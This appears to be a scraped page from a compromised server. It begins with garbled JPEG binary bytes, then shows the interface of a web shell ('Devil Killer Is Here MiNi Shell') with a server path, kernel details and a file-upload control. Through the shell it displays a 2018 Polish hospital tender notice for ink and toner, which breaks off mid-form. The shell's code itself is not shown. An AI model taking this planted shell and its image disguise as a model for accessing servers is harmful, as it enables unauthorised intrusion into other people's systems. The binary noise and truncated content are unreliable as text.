JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181109/646281-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 646281-N-2018 z dnia 2018-11-09 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Uniwersytecki Szpital Kliniczny nr 1 im. N. Barlickiego w Łodzi</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa tuszy i tonerów</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Uniwersytecki Szpital Kliniczny nr 1 im. N. Barlickiego w Łodzi</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">28877400000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Kopcińskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">22</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">90153 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Łódź</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">42 677 68 24, 42 291 95 70</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">dzial.zamowien.publicznych@barlicki.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">42 678 99 52</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.barlicki.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Samodzielny Publiczny Zakład Opieki Zdrowotnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.barlicki.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.barlicki.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Forma pisemna</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Sekretariat Finansowo-Techniczny SP ZOZ USK nr 1 UM w Łodzi, 90-153 Łódź, ul. Kopcińskiego 22, pok. 201, II piętro w budynku administracyjnym</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa tuszy i tonerów</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">37/ZP/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia USK nr 1 im N. Barlickiego w Łodzi, Gm. M. Łódź, pow. m. łódzki, województwo łódzkie jest dostawa tuszy i tonerów o właściwościach i ilościach szczegółowo wymienionych w załączniku nr 1A do specyfikacji stanowiącym jednocześnie formularz ofertowy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30125100-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">338608,74</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">24</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1.	Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy. W tym zakresie zastosowanie ma art. 26 ust. 6 ustawy Pzp1.1 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej, składa dokument/dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 1.2	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 1.3 W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.1.4 W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, o których mowa w ust. 1 niniejszego Rozdziału w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty.1.5 W przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów, o których mowa w ust. 1, które znajdują się w posiadaniu zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 ustawy, Zamawiający korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne.1.6 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w ust. 1 winien spełniać co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Pełnomocnictwo musi być złożone w formie oryginału lub notarialnie potwierdzonej kopii. Treść pełnomocnictwa powinna dokładnie określić zakres umocowania.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:a	żaden z Wykonawców nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ustawy;b	przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie musza spełniać warunki udziału w postępowaniu.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> 